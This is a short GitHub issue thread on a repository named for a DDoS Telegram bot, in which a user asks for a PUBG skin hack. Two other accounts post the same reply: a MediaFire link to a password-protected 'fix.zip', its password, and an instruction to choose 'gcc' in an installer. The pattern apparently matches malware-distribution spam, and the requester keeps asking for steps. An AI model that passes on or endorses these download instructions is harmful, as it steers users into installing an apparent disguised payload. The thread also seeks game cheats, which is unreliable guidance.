### ISSUE TITLE
Make pubg skin hack

### ISSUE THREAD

**Issue by dontlookbackk** [ansh5025/DDOS_TelegramBot#6]
Add mummy suit,glacier,xsuit,

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dontlookbackk** [comment]
Please give brief steps after downloading the file

**Comment by dontlookbackk** [comment]
> Download 
> https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
> password: changeme
> In the installer menu, select "gcc."

Bro give steps in detail plz

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
